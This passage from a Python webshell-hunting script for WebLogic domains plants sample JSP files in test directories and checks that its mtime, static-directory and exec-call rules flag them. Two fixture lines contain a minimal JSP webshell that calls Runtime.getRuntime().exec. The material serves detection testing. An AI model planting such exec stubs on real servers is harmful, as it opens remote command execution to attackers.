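               '<%-- constructed sample --%><% Runtime.getRuntime().exec("id"); %>')
        # Method 2 location: uddiexplorer staging dir, file newer than the baseline.
        _write(base / "user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/abc123/war/shell.jsp",
               '<%-- constructed sample --%><% Runtime.getRuntime().exec("id"); %>')
        # Method 3 location: an application's own JSP deployed before the baseline; must not be reported.
        _write(base / "user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_user/myapp/xyz789/war/index.jsp",
               "<html><body>hello</body></html>", mtime=baseline - 86400)
        return hunt_jsp(tmp, baseline)


if __name__ == "__main__":
    for path, reasons in demo():
        print(f"{reasons:50} {path}")
```

Run against a real domain directory, `hunt_jsp` takes the domain root and the timestamp of the last known-good deployment; the mtime rule will miss a file whose timestamp was reset, which is why the static-directory and exec-call rules are applied independently of it.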
Reference link
https://xz.aliyun.com/t/10365
https://cloud.tencent.com/developer/article/1861375
https://python.iitter.com/other/130547.html